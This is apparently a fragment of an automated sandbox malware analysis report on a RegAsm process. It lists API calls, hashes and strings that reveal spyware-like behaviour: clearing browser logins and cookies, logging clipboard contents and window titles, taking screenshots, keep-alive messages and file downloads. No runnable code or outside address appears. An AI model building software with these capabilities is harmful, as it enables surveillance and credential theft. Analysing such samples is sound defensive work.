                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetLastInputInfo$User32.dll
                            • API String ID: 2574300362-1519888992
                            • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                            • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                            • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                            • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                            • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                            • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                            • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                            • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                            • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                            • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                            • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                            • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                            • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                            • __freea.LIBCMT ref: 100087D5
                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                            • String ID:
                            • API String ID: 2652629310-0
                            • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                            • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                            • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                            • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                            APIs
                            Strings
                            • Cleared browsers logins and cookies., xrefs: 0040C130
                            • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                            • API String ID: 3472027048-1236744412
                            • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                            • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                            • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                            • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                            APIs
                            • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                            • EnumDisplayDevicesW.USER32(?), ref: 00419560
                            • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                            • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DisplayEnum$Devices$Monitors
                            • String ID:
                            • API String ID: 1432082543-0
                            • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                            • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                            • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                            • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                            APIs
                              • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                              • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                              • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                            • Sleep.KERNEL32(00000BB8), ref: 004127B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQuerySleepValue
                            • String ID: 8SG$`.S$exepath
                            • API String ID: 4119054056-650117895
                            • Opcode ID: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                            • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                            • Opcode Fuzzy Hash: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                            • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                            • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: File$CloseHandleReadSize
                            • String ID:
                            • API String ID: 3642004256-0
                            • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                            • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                            • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                            • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                            APIs
                              • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                              • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32 ref: 0041C5FB
                              • Part of subcall function 0041C5E2: GetWindowTextW.USER32 ref: 0041C625
                            • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                            • Sleep.KERNEL32(00000064), ref: 0040A638
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$ForegroundLength
                            • String ID: [ $ ]
                            • API String ID: 3309952895-93608704
                            • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                            • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                            • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                            • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: SystemTimes$Sleep__aulldiv
                            • String ID:
                            • API String ID: 188215759-0
                            • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                            • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                            • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                            • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                            • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                            • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                            • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                            APIs
                            • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                              • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                            • _UnwindNestedFrames.LIBCMT ref: 00439911
                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                            • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                            • String ID:
                            • API String ID: 2633735394-0
                            • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                            • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                            • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                            • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: MetricsSystem
                            • String ID:
                            • API String ID: 4116985748-0
                            • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                            • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                            • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                            • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                              • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                            • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                            • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                            • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHandling__start
                            • String ID: pow
                            • API String ID: 3213639722-2276729525
                            • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                            • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                            • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                            • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                            APIs
                            • _free.LIBCMT ref: 1000655C
                              • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                              • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                              • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                            • String ID: *?$.
                            • API String ID: 2667617558-3972193922
                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                            • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                            • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                            APIs
                            • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                              • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                            • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                              • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                              • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                            • String ID: image/jpeg
                            • API String ID: 1291196975-3785015651
                            • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                            • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                            • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                            • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                            APIs
                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                            • __Init_thread_footer.LIBCMT ref: 0040B7D2
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Init_thread_footer__onexit
                            • String ID: [End of clipboard]$[Text copied to clipboard]
                            • API String ID: 1881088180-3686566968
                            • Opcode ID: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                            • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                            • Opcode Fuzzy Hash: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                            • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                            APIs
                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ACP$OCP
                            • API String ID: 0-711371036
                            • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                            • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                            • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                            • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                            APIs
                            • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                              • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                            • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                              • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                              • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                            • String ID: image/png
                            • API String ID: 1291196975-2966254431
                            • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                            • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                            • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                            • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                            APIs
                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 481472006-1507639952
                            • Opcode ID: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                            • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                            • Opcode Fuzzy Hash: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                            • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                            APIs
                            • Sleep.KERNEL32 ref: 0041667B
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DownloadFileSleep
                            • String ID: !D@
                            • API String ID: 1931167962-604454484
                            • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                            • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                            • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                            • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
